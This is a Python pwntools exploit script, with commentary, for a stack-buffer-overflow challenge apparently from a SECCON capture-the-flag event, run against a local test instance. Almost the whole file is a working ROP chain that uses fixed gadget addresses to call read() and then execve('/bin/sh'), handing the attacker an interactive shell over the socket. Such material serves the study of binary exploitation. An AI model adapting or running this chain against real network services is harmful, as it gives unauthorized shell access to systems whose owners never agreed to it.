#!/usr/bin/env python
# Python 2 pwntools script (raw_input(), str payloads): a stack-overflow ROP
# chain for the CTF service named in the commented-out remote() below.
# Every address in the chain is absolute, so it only works if the binary is
# mapped at a fixed base (no PIE) and there is no stack canary between the
# overflowed buffer and the saved return address; either mitigation breaks it.
from pwn import *
#r = remote('baby_stack.pwn.seccon.jp', 15285)
# Local test instance; the original target is the commented-out line above.
r = remote('127.0.0.1',8888)
# Log every byte sent and received so the exchange can be inspected.
context.log_level = 'debug'
# Pause before anything is sent -- presumably so a debugger can be attached to
# the local service first.
raw_input()
# Absolute addresses taken from the target binary. `thank` is written into the
# overflowed frame twice (paired with 0x20); what the program does with it
# can't be told from this listing -- confirm against the binary.
thank = 0x5220a0
# End of the writable .bss; fixed offsets below it are used as scratch space,
# which is why the chain depends on a non-randomised image.
elfbssend = 0x005a0000
# ROP gadgets, named by the register each pops. `sysenter` is the author's
# label for the syscall-entry gadget; on x86-64 this is presumably a
# `syscall` instruction rather than SYSENTER -- verify in the disassembly.
poprax = 0x004016ea
poprsi = 0x0046defd
poprdx = 0x00000000004a247c
poprdi = 0x0000000000470931
sysenter = 0x0000000000456889
# De Bruijn pattern used while locating the 104/200/408-byte offsets below.
#payload = cyclic(200, n=8)
# Frame layout: 104 bytes of filler, (thank, 0x20) at offset 104 and again at
# offset 200, then filler up to offset 408, where the saved return address sits
# and the chain begins.
payload = 'a'*104
payload += p64(thank)
payload += p64(0x20)
payload += 'b'*(200 - len(payload))
payload += p64(thank)
payload += p64(0x20)
payload += 'c'*(408 - len(payload))
# Chain 1: read(0, elfbssend-0x400, 0x100) -- syscall 0 on x86-64. rax is
# first loaded with elfbssend-0x500 and only afterwards with 0; the purpose of
# that first load isn't evident here (the gadget may consume or clobber it).
payload += p64(poprax)
payload += p64(elfbssend - 0x500)
payload += p64(poprdi)
payload += p64(0)
payload += p64(poprsi)
payload += p64(elfbssend - 0x400)
payload += p64(poprdx)
payload += p64(0x100)
payload += p64(poprax)
payload += p64(0)
payload += p64(sysenter)
#execve
# Chain 2: execve(elfbssend-0x400, NULL, NULL) -- 0x3b on x86-64. rdi points at
# the buffer the read() above fills; the same rax double-load pattern is used.
payload += p64(poprax)
payload += p64(elfbssend - 0x500)
payload += p64(poprdi)
payload += p64(elfbssend - 0x400)
payload += p64(poprsi)
payload += p64(0x0)
payload += p64(poprdx)
payload += p64(0x0)
payload += p64(poprax)
payload += p64(0x3b)
payload += p64(sysenter)
# The first `>> ` prompt gets a throwaway answer; the second gets the overflow.
r.sendlineafter('>> ', 'abcd')
r.sendlineafter('>> ', payload)
# String that the read() deposits in .bss and execve() then runs; the NUL
# terminator is written explicitly. `time` is not imported here -- presumably
# re-exported by `from pwn import *`.
payload = "/bin/sh\x00"
time.sleep(0.5)
r.sendline(payload)
# From here the spawned shell is attached to the socket. A network-facing
# service exec()ing /bin/sh is the detection signal for this class of bug.
r.interactive()